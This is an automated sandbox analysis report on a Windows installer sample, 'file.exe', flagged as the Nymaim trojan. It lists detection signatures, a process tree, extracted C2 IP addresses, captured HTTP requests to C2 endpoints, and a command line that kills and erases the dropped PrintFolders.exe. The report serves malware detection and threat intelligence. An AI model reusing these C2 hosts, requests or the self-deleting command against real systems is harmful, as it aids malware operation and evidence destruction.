Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample Name:	file.exe
Analysis ID:	753425
MD5:	2ed741014b8cdafd91a740432a3cffa1
SHA1:	3d65ac9a3d0950a55d4c7e4cb5a6fbfeab180cab
SHA256:	fc33189d3c146375f5742bbb0e82277e2b8ed3789d8feae27939e834b07ee8dc
Tags:	exe
Infos:

Detection

Nymaim

Score:	88
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Detected unpacking (overwrites its own PE header)

Yara detected Nymaim

Detected unpacking (changes PE section rights)

Antivirus detection for URL or domain

Multi AV Scanner detection for dropped file

Machine Learning detection for dropped file

C2 URLs / IPs found in malware configuration

Uses 32bit PE files

Antivirus or Machine Learning detection for unpacked file

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to query locales information (e.g. system language)

Uses code obfuscation techniques (call, push, ret)

Found evasive API chain (date check)

PE file contains sections with non-standard names

Internet Provider seen in connection with other malware

Detected potential crypto function

Contains functionality to query CPU information (cpuid)

Found potential string decryption / allocating functions

Sample execution stops while process was sleeping (likely an evasion)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to call native functions

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Found dropped PE file which has not been started or loaded

Contains functionality which may be used to detect a debugger (GetProcessHeap)

PE file contains executable resources (Code or Archives)

IP address seen in connection with other malware

Enables debug privileges

Creates a DirectInput object (often for capturing keystrokes)

PE file does not import any functions

Sample file is different than original file name gathered from version info

Drops PE files

Contains functionality to read the PEB

Found evasive API chain checking for process token information

Uses taskkill to terminate processes

Dropped file seen in connection with other malware

Uses Microsoft's Enhanced Cryptographic Provider

Contains functionality to detect sandboxes (foreground window change detection)

Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

System is w10x64

file.exe (PID: 6084 cmdline: C:\Users\user\Desktop\file.exe MD5: 2ED741014B8CDAFD91A740432A3CFFA1)

is-QPTG8.tmp (PID: 6080 cmdline: "C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp" /SL4 $40228 "C:\Users\user\Desktop\file.exe" 1252960 51712 MD5: 85B94E72C3F2D2B5464E2AAF3C9E242A)

PrintFolders.exe (PID: 4532 cmdline: "C:\Program Files (x86)\PrintFolders\PrintFolders.exe" MD5: 2ABBE052537A4C836AFE8DBAC888F131)

uywwtiNQ.exe (PID: 6120 cmdline: MD5: 3FB36CB0B7172E5298D2992D42984D06)

cmd.exe (PID: 1336 cmdline: "C:\Windows\System32\cmd.exe" /c taskkill /im "PrintFolders.exe" /f & erase "C:\Program Files (x86)\PrintFolders\PrintFolders.exe" & exit MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 1760 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

taskkill.exe (PID: 3416 cmdline: taskkill /im "PrintFolders.exe" /f MD5: 15E2E0ACD891510C6268CB8899F2A1A1)

cleanup

Malware Configuration

Threatname: Nymaim

{"C2 addresses": ["45.139.105.1", "85.31.46.167", "107.182.129.235", "171.22.30.106"]}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000002.00000002.325696039.0000000001660000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
00000002.00000002.326103420.00000000033A0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
00000002.00000002.325006522.0000000000400000.00000040.00000001.01000000.00000006.sdmp	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security

Unpacked PEs

Source	Rule	Description	Author
2.2.PrintFolders.exe.400000.1.unpack	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
2.2.PrintFolders.exe.400000.1.raw.unpack	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
2.2.PrintFolders.exe.33a0000.3.unpack	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
2.2.PrintFolders.exe.33a0000.3.raw.unpack	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: http://171.22.30.106/library.php	URL Reputation: Label: malware
Source: http://171.22.30.106/library.phpXZ	Avira URL Cloud: Label: malware
Source: http://171.22.30.106/library.phpBZ	Avira URL Cloud: Label: malware

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\{e6e9dfa8-98f2-11e9-90ce-806e6f6e6963}\uywwtiNQ.exe

ReversingLabs: Detection: 46%

Machine Learning detection for dropped file

Source: C:\Program Files (x86)\PrintFolders\PrintFolders.exe

Joe Sandbox ML: detected

Source: 2.2.PrintFolders.exe.10000000.6.unpack	Avira: Label: TR/Crypt.XPACK.Gen8
Source: 0.3.file.exe.20b8000.6.unpack	Avira: Label: TR/Patched.Ren.Gen

Source: 2.2.PrintFolders.exe.400000.1.unpack

Malware Configuration Extractor: Nymaim {"C2 addresses": ["45.139.105.1", "85.31.46.167", "107.182.129.235", "171.22.30.106"]}

Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp	Code function: 1_2_10001000 ISCryptGetVersion,	1_2_10001000
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp	Code function: 1_2_10001130 ArcFourCrypt,	1_2_10001130
Source: C:\Program Files (x86)\PrintFolders\PrintFolders.exe	Code function: 2_2_00403770 CryptAcquireContextW,CryptCreateHash,_mbstowcs,CryptHashData,GetLastError,CryptDeriveKey,GetLastError,CryptReleaseContext,CryptDecrypt,CryptDestroyKey,___std_exception_copy,	2_2_00403770

Compliance

Detected unpacking (overwrites its own PE header)

Source: C:\Program Files (x86)\PrintFolders\PrintFolders.exe

Unpacked PE file: 2.2.PrintFolders.exe.400000.1.unpack

Source: file.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI

Source:

Binary string: E:\DATA\Codework\PrintFolders\source\Release\Russian.pdb source: is-2632S.tmp.1.dr

Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp	Code function: 1_2_0046C770 FindFirstFileA,FindNextFileA,FindClose,	1_2_0046C770
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp	Code function: 1_2_00474708 FindFirstFileA,FindNextFileA,FindClose,FindFirstFileA,FindNextFileA,FindClose,	1_2_00474708
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp	Code function: 1_2_00451554 FindFirstFileA,GetLastError,	1_2_00451554
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp	Code function: 1_2_0048A778 FindFirstFileA,6D2B69D0,FindNextFileA,FindClose,	1_2_0048A778
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp	Code function: 1_2_004729D4 FindFirstFileA,FindNextFileA,FindClose,FindFirstFileA,FindNextFileA,FindClose,	1_2_004729D4
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp	Code function: 1_2_0045CA54 FindFirstFileA,FindNextFileA,FindClose,	1_2_0045CA54
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp	Code function: 1_2_00406FEC FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime,	1_2_00406FEC
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp	Code function: 1_2_0045DB60 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,	1_2_0045DB60
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp	Code function: 1_2_0045DEF4 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,	1_2_0045DEF4
Source: C:\Program Files (x86)\PrintFolders\PrintFolders.exe	Code function: 2_2_00404490 FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,	2_2_00404490
Source: C:\Program Files (x86)\PrintFolders\PrintFolders.exe	Code function: 2_2_00423E2D FindFirstFileExW,	2_2_00423E2D
Source: C:\Program Files (x86)\PrintFolders\PrintFolders.exe	Code function: 2_2_1000959D FindFirstFileExW,	2_2_1000959D

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Temp\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp	Jump to behavior

Networking

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	IPs: 45.139.105.1
Source: Malware configuration extractor	IPs: 85.31.46.167
Source: Malware configuration extractor	IPs: 107.182.129.235
Source: Malware configuration extractor	IPs: 171.22.30.106

Source: Joe Sandbox View

ASN Name: CMCSUS CMCSUS

Source: Joe Sandbox View

IP Address: 45.139.105.171 45.139.105.171

Source: unknown	TCP traffic detected without corresponding DNS query: 45.139.105.171
Source: unknown	TCP traffic detected without corresponding DNS query: 45.139.105.171
Source: unknown	TCP traffic detected without corresponding DNS query: 45.139.105.171
Source: unknown	TCP traffic detected without corresponding DNS query: 45.139.105.171
Source: unknown	TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown	TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown	TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown	TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown	TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown	TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown	TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown	TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown	TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown	TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown	TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown	TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown	TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown	TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown	TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown	TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown	TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown	TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown	TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown	TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown	TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown	TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown	TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown	TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown	TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown	TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown	TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown	TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown	TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown	TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown	TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown	TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown	TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown	TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown	TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown	TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown	TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown	TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown	TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown	TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown	TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown	TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown	TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown	TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown	TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown	TCP traffic detected without corresponding DNS query: 107.182.129.235

Source: PrintFolders.exe, 00000002.00000002.325958183.0000000001773000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://107.182.129.235/storage/extension.php
Source: PrintFolders.exe, 00000002.00000002.325958183.0000000001773000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://107.182.129.235/storage/extension.phpum
Source: PrintFolders.exe, 00000002.00000002.325942100.0000000001762000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://107.182.129.235/storage/ping.php
Source: PrintFolders.exe, 00000002.00000002.325942100.0000000001762000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://171.22.30.106/library.phpBZ
Source: PrintFolders.exe, 00000002.00000002.325942100.0000000001762000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://171.22.30.106/library.phpXZ
Source: file.exe, 00000000.00000003.239393272.00000000020B1000.00000004.00001000.00020000.00000000.sdmp, is-QPTG8.tmp, 00000001.00000003.240607544.0000000002750000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://pfolders.atopoint.com
Source: file.exe, 00000000.00000003.327202532.00000000020B1000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.239393272.00000000020B1000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://pfolders.atopoint.com.
Source: file.exe, 00000000.00000003.239322832.00000000021A0000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.327202532.00000000020B1000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.239393272.00000000020B1000.00000004.00001000.00020000.00000000.sdmp, is-QPTG8.tmp, 00000001.00000003.240607544.0000000002750000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.atopoint.com
Source: file.exe, 00000000.00000003.327202532.00000000020B1000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.239393272.00000000020B1000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.atopoint.com.
Source: file.exe	String found in binary or memory: http://www.innosetup.com
Source: is-QPTG8.tmp, is-QPTG8.tmp, 00000001.00000000.240048151.0000000000401000.00000020.00000001.01000000.00000004.sdmp, is-48N1K.tmp.1.dr, is-QPTG8.tmp.0.dr	String found in binary or memory: http://www.innosetup.com/
Source: file.exe, 00000000.00000003.239484290.00000000021A0000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.239653432.00000000020B8000.00000004.00001000.00020000.00000000.sdmp, is-QPTG8.tmp, 00000001.00000002.326821048.00000000004BC000.00000002.00000001.01000000.00000004.sdmp, is-48N1K.tmp.1.dr, is-QPTG8.tmp.0.dr	String found in binary or memory: http://www.innosetup.comDVarFileInfo$
Source: file.exe, 00000000.00000003.239484290.00000000021A0000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.239653432.00000000020B8000.00000004.00001000.00020000.00000000.sdmp, is-QPTG8.tmp, is-QPTG8.tmp, 00000001.00000000.240048151.0000000000401000.00000020.00000001.01000000.00000004.sdmp, is-48N1K.tmp.1.dr, is-QPTG8.tmp.0.dr	String found in binary or memory: http://www.remobjects.com/?ps
Source: file.exe, 00000000.00000003.239484290.00000000021A0000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.239653432.00000000020B8000.00000004.00001000.00020000.00000000.sdmp, is-QPTG8.tmp, 00000001.00000000.240048151.0000000000401000.00000020.00000001.01000000.00000004.sdmp, is-48N1K.tmp.1.dr, is-QPTG8.tmp.0.dr	String found in binary or memory: http://www.remobjects.com/?psU

Source: C:\Program Files (x86)\PrintFolders\PrintFolders.exe

Code function: 2_2_00401B30 HttpAddRequestHeadersA,InternetSetFilePointer,InternetReadFile,HttpQueryInfoA,CoCreateInstance,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,

2_2_00401B30

Source: global traffic	HTTP traffic detected: GET /itsnotmalware/count.php?sub=NOSUB&stream=mixtwo&substream=mixinte HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: 1Host: 45.139.105.171Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /storage/ping.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: 0Host: 107.182.129.235Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /storage/extension.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: 1Host: 107.182.129.235Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /library.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: 2Host: 171.22.30.106Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /library.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: 2Host: 171.22.30.106Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /library.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: 2Host: 171.22.30.106Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /library.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: 2Host: 171.22.30.106Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /library.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: 2Host: 171.22.30.106Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /library.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: 2Host: 171.22.30.106Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /library.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: 2Host: 171.22.30.106Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /library.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: 2Host: 171.22.30.106Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /library.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: 2Host: 171.22.30.106Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /library.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: 2Host: 171.22.30.106Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /library.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: 2Host: 171.22.30.106Connection: Keep-AliveCache-Control: no-cache

Source: file.exe, 00000000.00000002.327400312.0000000000708000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud

Yara detected Nymaim

Source: Yara match	File source: 2.2.PrintFolders.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.PrintFolders.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.PrintFolders.exe.33a0000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.PrintFolders.exe.33a0000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.325696039.0000000001660000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.326103420.00000000033A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.325006522.0000000000400000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY

Source: file.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004081C8	0_2_004081C8
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp	Code function: 1_2_00468940	1_2_00468940
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp	Code function: 1_2_00460F30	1_2_00460F30
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp	Code function: 1_2_0043DF70	1_2_0043DF70
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp	Code function: 1_2_004303A4	1_2_004303A4
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp	Code function: 1_2_0047A6D8	1_2_0047A6D8
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp	Code function: 1_2_004446E8	1_2_004446E8
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp	Code function: 1_2_00434994	1_2_00434994
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp	Code function: 1_2_0045AA90	1_2_0045AA90
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp	Code function: 1_2_00480BDC	1_2_00480BDC
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp	Code function: 1_2_00444C90	1_2_00444C90
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp	Code function: 1_2_00462F38	1_2_00462F38
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp	Code function: 1_2_00445388	1_2_00445388
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp	Code function: 1_2_00435698	1_2_00435698
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp	Code function: 1_2_00445794	1_2_00445794
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp	Code function: 1_2_0042F948	1_2_0042F948
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp	Code function: 1_2_00457BB4	1_2_00457BB4
Source: C:\Program Files (x86)\PrintFolders\PrintFolders.exe	Code function: 2_2_00404490	2_2_00404490
Source: C:\Program Files (x86)\PrintFolders\PrintFolders.exe	Code function: 2_2_004096F0	2_2_004096F0
Source: C:\Program Files (x86)\PrintFolders\PrintFolders.exe	Code function: 2_2_004056A0	2_2_004056A0
Source: C:\Program Files (x86)\PrintFolders\PrintFolders.exe	Code function: 2_2_00406800	2_2_00406800
Source: C:\Program Files (x86)\PrintFolders\PrintFolders.exe	Code function: 2_2_00406AA0	2_2_00406AA0
Source: C:\Program Files (x86)\PrintFolders\PrintFolders.exe	Code function: 2_2_00404D40	2_2_00404D40
Source: C:\Program Files (x86)\PrintFolders\PrintFolders.exe	Code function: 2_2_00405F40	2_2_00405F40
Source: C:\Program Files (x86)\PrintFolders\PrintFolders.exe	Code function: 2_2_00402F20	2_2_00402F20
Source: C:\Program Files (x86)\PrintFolders\PrintFolders.exe	Code function: 2_2_004150D3	2_2_004150D3
Source: C:\Program Files (x86)\PrintFolders\PrintFolders.exe	Code function: 2_2_00415305	2_2_00415305
Source: C:\Program Files (x86)\PrintFolders\PrintFolders.exe	Code function: 2_2_004223A9	2_2_004223A9
Source: C:\Program Files (x86)\PrintFolders\PrintFolders.exe	Code function: 2_2_00419510	2_2_00419510
Source: C:\Program Files (x86)\PrintFolders\PrintFolders.exe	Code function: 2_2_00404840	2_2_00404840
Source: C:\Program Files (x86)\PrintFolders\PrintFolders.exe	Code function: 2_2_00426850	2_2_00426850
Source: C:\Program Files (x86)\PrintFolders\PrintFolders.exe	Code function: 2_2_00410A50	2_2_00410A50
Source: C:\Program Files (x86)\PrintFolders\PrintFolders.exe	Code function: 2_2_0042AB9A	2_2_0042AB9A
Source: C:\Program Files (x86)\PrintFolders\PrintFolders.exe	Code function: 2_2_00421C88	2_2_00421C88
Source: C:\Program Files (x86)\PrintFolders\PrintFolders.exe	Code function: 2_2_0042ACBA	2_2_0042ACBA
Source: C:\Program Files (x86)\PrintFolders\PrintFolders.exe	Code function: 2_2_00447D2D	2_2_00447D2D
Source: C:\Program Files (x86)\PrintFolders\PrintFolders.exe	Code function: 2_2_00428D39	2_2_00428D39
Source: C:\Program Files (x86)\PrintFolders\PrintFolders.exe	Code function: 2_2_00404F20	2_2_00404F20
Source: C:\Program Files (x86)\PrintFolders\PrintFolders.exe	Code function: 2_2_1000F670	2_2_1000F670
Source: C:\Program Files (x86)\PrintFolders\PrintFolders.exe	Code function: 2_2_1000EC61	2_2_1000EC61

Source: C:\Program Files (x86)\PrintFolders\PrintFolders.exe	Code function: String function: 10003C50 appears 34 times
Source: C:\Program Files (x86)\PrintFolders\PrintFolders.exe	Code function: String function: 0040F9E0 appears 54 times
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp	Code function: String function: 004035DC appears 90 times
